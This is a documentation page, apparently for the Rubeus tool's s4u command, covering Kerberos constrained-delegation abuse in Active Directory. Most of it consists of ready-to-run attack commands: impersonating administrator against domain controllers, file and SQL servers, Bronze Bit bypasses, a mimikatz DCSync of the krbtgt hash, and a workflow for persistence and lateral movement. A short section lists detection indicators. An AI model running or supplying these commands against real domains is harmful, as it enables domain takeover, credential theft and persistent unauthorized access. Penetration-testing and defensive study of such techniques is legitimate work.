s4u

S4U delegation abuse enables impersonation of any domain user, including administrators, providing critical privilege escalation and lateral movement capabilities.

User Impersonation

Impersonate any domain user without their credentials

Service Access

Gain access to backend services via delegation

Privilege Escalation

Escalate from service account to domain admin

Cross-Domain

Exploit delegation across domain boundaries

Overview

Perform S4U (Service for User) constrained delegation abuse to impersonate users and gain access to services. This technique exploits Kerberos constrained delegation configurations to escalate privileges and move laterally through Active Directory environments.

Basic Syntax
Authentication Methods
Target Configuration

# Core S4U delegation attack
Rubeus.exe s4u [authentication] /impersonateuser:USER /msdsspn:SERVICE [options]

# Common attack pattern
Rubeus.exe s4u /user:svcaccount /rc4:hash /impersonateuser:administrator /msdsspn:cifs/target.domain.com /ptt

Core Parameters
Authentication Options
Advanced Options

Hide Authentication & Impersonation

user

string

Show Service Account Details

Service account name configured for delegationRequirements:

Account must have delegation rights
Must be configured for constrained delegation
Requires corresponding hash or TGT

Discovery Commands:

# Find delegation-enabled accounts
Get-ADUser -Filter {TrustedToAuthForDelegation -eq $true}

impersonateuser

string

required

Show Target User Selection

User to impersonate via delegationHigh-Value Targets:

administrator - Built-in admin account
domain admin - Domain administrative users
service accounts - High-privilege service accounts
computer accounts - Machine account impersonation

Notes:

Can impersonate ANY domain user
No password/hash required for target
Includes protected users (with some limitations)

msdsspn

string

required

Show Delegation Target Service

Service Principal Name for delegation targetFormat: service/hostname.domain.com[:port]Common Patterns:

cifs/fileserver.corp.local - File services
http/web.corp.local - Web applications
MSSQLSvc/sql.corp.local:1433 - Database
ldap/dc.corp.local - Directory services
host/server.corp.local - Administrative access

Discovery: Check service account’s delegation configuration

Basic Delegation
Service Escalation
Cross-Domain Attacks
Advanced Techniques
Integration Workflows

# Service account to file server
Rubeus.exe s4u /user:svc_web /rc4:32ed87bdb5fdc5e9cba88547376818d4 /impersonateuser:administrator /msdsspn:cifs/fileserver.corp.local /ptt

# Service account to database
Rubeus.exe s4u /user:svc_app /aes256:b982a9a15bc34fd3ccfb18041095b5394a7c6a0a9f2e02c3d6b8d86a59a73f02 /impersonateuser:administrator /msdsspn:MSSQLSvc/sql01.corp.local:1433 /ptt

# Service account to domain controller
Rubeus.exe s4u /user:svc_backup /rc4:hash /impersonateuser:administrator /msdsspn:ldap/dc01.corp.local /ptt

S4U Protocol Flow

S4U2Self Phase
S4U2Proxy Phase
Service Access

Request

Service → KDC

Service requests TGS for itself
On behalf of target user
Results in forwardable ticket
Uses service account credentials

Response

KDC → Service

Returns forwardable TGS
Ticket marked for delegation
Contains user’s identity
Ready for S4U2Proxy

Technical Details:

Service authenticates with its own credentials
Requests ticket “for” another user
No user credentials required
Results in forwardable service ticket

Delegation Types

Unconstrained Delegation
Constrained Delegation
Resource-Based (RBCD)

Unconstrained delegation provides the highest attack surface and risk

Characteristics:

Service can delegate to ANY service
Stores user’s TGT for reuse
No restrictions on delegation targets
Legacy configuration pattern

Attack Implications:

Complete user impersonation capability
Access to any domain service
TGT extraction opportunities
High privilege escalation potential

Detection: userAccountControl contains TRUSTED_FOR_DELEGATION (524288)

Configuration Requirements

Hide Service Account Prerequisites

Required Privileges:

SeAssignPrimaryTokenPrivilege (Act as part of operating system)
SeTcbPrivilege (Act as part of operating system)
Service account must be configured for delegation

Delegation Configuration:

Trust for delegation enabled
Specific services configured in delegation list
Proper SPN registration
Domain functional level support

Security Boundaries:

Protected Users group (limited)
Account cannot be delegated flag
Cross-forest restrictions
Time-based limitations

Prerequisites
Discovery Commands
Assessment Matrix

Service Account Compromise

Credential Requirements

Required Access:

Service account password hash (RC4/AES)
Valid TGT for service account
Certificate-based authentication
Kerberos ticket extraction

Configuration Validation

Verification Steps:

Account has delegation configuration
Target services in delegation list
Proper privilege assignments
Domain controller accessibility

Credential Acquisition Methods:

Kerberoasting service account
DCSync for password hashes
Memory extraction (dump, lsass)
Golden ticket with service account

Delegation Discovery

Account Enumeration:

# Find all delegation-enabled accounts
Get-ADUser -Filter {TrustedToAuthForDelegation -eq $true} -Properties servicePrincipalName,msDS-AllowedToDelegateTo

# Include computer accounts
Get-ADComputer -Filter {TrustedToAuthForDelegation -eq $true} -Properties servicePrincipalName,msDS-AllowedToDelegateTo

# Find unconstrained delegation
Get-ADUser -Filter {TrustedForDelegation -eq $true}

Service Validation:

Verify SPN registration
Check delegation target list
Validate service accessibility
Test network connectivity

Target Assessment

High-Value Targets:

Domain controllers (LDAP, GC)
File servers (CIFS)
Database servers (MSSQLSvc)
Web applications (HTTP/HTTPS)
Administrative services (HOST)

Privilege Analysis:

Administrative service access
Cross-domain delegation
Service account privileges
Delegation scope assessment

Service Categories
Service Equivalence
Target Selection

Infrastructure Services

Domain Controllers:

ldap/dc.corp.local - Directory services
gc/dc.corp.local - Global catalog
dns/dc.corp.local - DNS services
host/dc.corp.local - Administrative access

Critical Impact: Domain admin equivalent access

File Services

File Servers:

cifs/fileserver.corp.local - SMB shares
nfs/fileserver.corp.local - NFS shares
host/fileserver.corp.local - Admin access

Access Scope: File system, administrative shells

Database Services

SQL Servers:

MSSQLSvc/sql.corp.local:1433 - SQL Server
oracle/db.corp.local:1521 - Oracle
mysql/db.corp.local:3306 - MySQL

Privilege Escalation: Database admin, OS access

Web Services

Application Servers:

http/web.corp.local - Web applications
https/web.corp.local - Secure web
ws/web.corp.local - Web services

Attack Surface: Application admin, IIS access

Bronze Bit Attack
Cross-Domain Exploitation
Advanced Persistence

Bronze Bit attacks exploit PAC validation weaknesses to bypass delegation restrictions

Technique Overview

Core Concept:

Exploits missing PAC validation in S4U2Proxy
Allows delegation without proper configuration
Bypasses msDS-AllowedToDelegateTo restrictions
Works against services not in delegation list

Technical Mechanism:

Service requests S4U2Self ticket
Modifies or removes PAC validation
Uses ticket for S4U2Proxy to any service
Target service accepts without validation

Implementation Requirements

Prerequisites

Required Access:

Compromised service account
Service account hash or TGT
Network access to target
Target service existence

Limitations

Environmental Factors:

Some services validate PAC
Modern Windows may block
Patch level dependent
Domain functional level

Attack Execution:

# Standard Bronze Bit
Rubeus.exe s4u /user:svc_account /rc4:hash /impersonateuser:administrator /msdsspn:cifs/target.corp.local /bronzebit /nopac /ptt

# With service alternation
Rubeus.exe s4u /user:svc_web /aes256:key /impersonateuser:administrator /msdsspn:http/web.corp.local /altservice:cifs,host /bronzebit /nopac /ptt

Target Expansion

Unrestricted Targeting:

Attack services not in delegation list
Bypass delegation configuration entirely
Access any reachable service
Combine with service substitution

Strategic Applications:

# Target domain controllers (not in delegation list)
/msdsspn:ldap/dc01.corp.local /bronzebit /nopac

# Access administrative services
/msdsspn:host/critical.corp.local /bronzebit /nopac

# Multi-service bronze bit
/msdsspn:http/any.corp.local /altservice:cifs,host,ldap /bronzebit /nopac

Domain Escalation
Lateral Movement
Specialized Scenarios

Service Account Discovery

Target Identification:

# Find high-privilege delegation targets
Get-ADUser -Filter {TrustedToAuthForDelegation -eq $true} -Properties msDS-AllowedToDelegateTo | Where {$_.msDS-AllowedToDelegateTo -like "*ldap*" -or $_.msDS-AllowedToDelegateTo -like "*gc*"}

# Identify domain controller delegation
Get-ADUser -Filter {TrustedToAuthForDelegation -eq $true} -Properties msDS-AllowedToDelegateTo | Where {$_.msDS-AllowedToDelegateTo -match "ldap/.*\.corp\.local"}

Service Account Compromise:

Kerberoast delegation-enabled accounts
Target service accounts with DC access
Extract credentials via memory dumps
Golden ticket for service accounts

Domain Controller Access

LDAP Service Targeting

# LDAP delegation to DC
Rubeus.exe s4u /user:svc_exchange /rc4:hash /impersonateuser:administrator /msdsspn:ldap/dc01.corp.local /ptt

# Global catalog access
Rubeus.exe s4u /user:svc_app /aes256:key /impersonateuser:administrator /msdsspn:gc/dc01.corp.local /ptt

Result: Directory service administrative access

HOST Service Escalation

# Full administrative access
Rubeus.exe s4u /user:svc_backup /rc4:hash /impersonateuser:administrator /msdsspn:host/dc01.corp.local /ptt

# Alternative service expansion
Rubeus.exe s4u /user:svc_web /aes256:key /impersonateuser:administrator /msdsspn:http/dc01.corp.local /altservice:host,cifs,ldap /ptt

Result: Domain admin equivalent access

Verification & Exploitation

Access Confirmation:

# Verify delegation success
Rubeus.exe klist

# Test domain admin access
dir \\dc01.corp.local\c$
net user /domain

# DCSync capability
mimikatz "lsadump::dcsync /user:krbtgt"

Persistence Establishment:

Create additional delegation accounts
Extract KRBTGT hash for golden tickets
Add to administrative groups
Deploy backdoor accounts

Detection Indicators
Monitoring Strategies
Mitigation Controls

S4U delegation attacks generate distinctive patterns that can be detected through comprehensive monitoring

Hide Event Log Analysis

Primary Event IDs:

4769 - Kerberos service ticket was requested
4770 - Kerberos service ticket was renewed
4771 - Kerberos pre-authentication failed
4768 - Kerberos authentication ticket (TGT) was requested

S4U-Specific Patterns:

Event 4769 Analysis:
- Service Name: Contains target service SPN
- Account Name: Service account performing delegation
- Client Address: Often ::1 (localhost) for S4U operations
- Ticket Options: 0x40810010 (forwardable, renewable)
- Ticket Encryption Type: May show downgrade to RC4

Anomaly Detection:

Service accounts requesting tickets for administrators
Rapid succession of S4U2Self → S4U2Proxy events
Cross-domain ticket requests
Service tickets for services not in delegation list

Show Behavioral Analysis

Service Account Anomalies:

Service accounts authenticating outside normal patterns
Requests for high-privilege user impersonation
Access to services outside typical workflow
Authentication from unexpected source IPs

Delegation Pattern Analysis:

Multiple delegation attempts in short timeframes
Failed delegation attempts followed by successful ones
Cross-domain delegation activities
Service substitution patterns (/altservice usage)

Network-Level Indicators:

Kerberos traffic from non-domain member systems
Unusual authentication timing patterns
Multiple service ticket requests to different services
Cross-network authentication attempts

Show Technical Signatures

API Usage Patterns:

LsaCallAuthenticationPackage with S4U structures
Multiple rapid Kerberos API calls
Non-standard authentication flows
Service ticket requests with modified PACs

Process Behavior:

Non-service processes performing delegation
Processes running with service account contexts
Memory access patterns consistent with credential extraction
Rubeus or similar tool execution artifacts

Ticket Requests

asktgs - Manual service ticket requests for delegation preparation

Ticket Analysis

describe - Deep analysis of delegated ticket structure and contents

Ticket Injection

ptt - Inject delegated service tickets into current or target sessions

Golden Tickets

golden - Create domain-wide tickets with delegation capabilities

Credential Extraction

dump - Extract service account tickets for delegation attacks

Session Management

createnetonly - Create isolated sessions for delegated ticket usage

Integration Workflows

Discovery Phase

Identify delegation opportunities:

# Find delegation-enabled accounts
# PowerShell: Get-ADUser -Filter {TrustedToAuthForDelegation -eq $true}

# Extract service account credentials
Rubeus.exe asktgt /user:discovered_svc /rc4:extracted_hash

Exploitation Phase

Execute delegation attack:

# Perform S4U delegation
Rubeus.exe s4u /user:svc_account /rc4:hash /impersonateuser:administrator /msdsspn:target_service /ptt

# Verify successful delegation
Rubeus.exe klist

Analysis & Expansion

Analyze and expand access:

# Analyze delegated ticket
Rubeus.exe describe /ticket:base64_ticket

# Expand to related services
Rubeus.exe s4u /ticket:current_tgt /impersonateuser:administrator /msdsspn:original_service /altservice:cifs,host,ldap /ptt

Persistence & Movement

Establish persistence and move laterally:

# Save high-value tickets
Rubeus.exe s4u /user:svc_account /rc4:hash /impersonateuser:administrator /msdsspn:ldap/dc.corp.local /outfile:dc_access.kirbi

# Create dedicated session
Rubeus.exe createnetonly /program:cmd.exe
Rubeus.exe ptt /ticket:dc_access.kirbi /luid:new_session_luid

Getting Started

Ticket Operations

Attack Techniques

Miscellaneous

User Impersonation

Service Access

Privilege Escalation

Cross-Domain

Overview

Request

Response

Credential Requirements

Configuration Validation

Infrastructure Services

File Services

Database Services

Web Services

Prerequisites

Limitations

LDAP Service Targeting

HOST Service Escalation

Ticket Requests

Ticket Analysis

Ticket Injection

Golden Tickets

Credential Extraction

Session Management

Integration Workflows

Getting Started

Ticket Operations

Attack Techniques

Miscellaneous

User Impersonation

Service Access

Privilege Escalation

Cross-Domain

​Overview

Request

Response

Credential Requirements

Configuration Validation

Infrastructure Services

File Services

Database Services

Web Services

Prerequisites

Limitations

LDAP Service Targeting

HOST Service Escalation

Ticket Requests

Ticket Analysis

Ticket Injection

Golden Tickets

Credential Extraction

Session Management

​Integration Workflows

Overview

Integration Workflows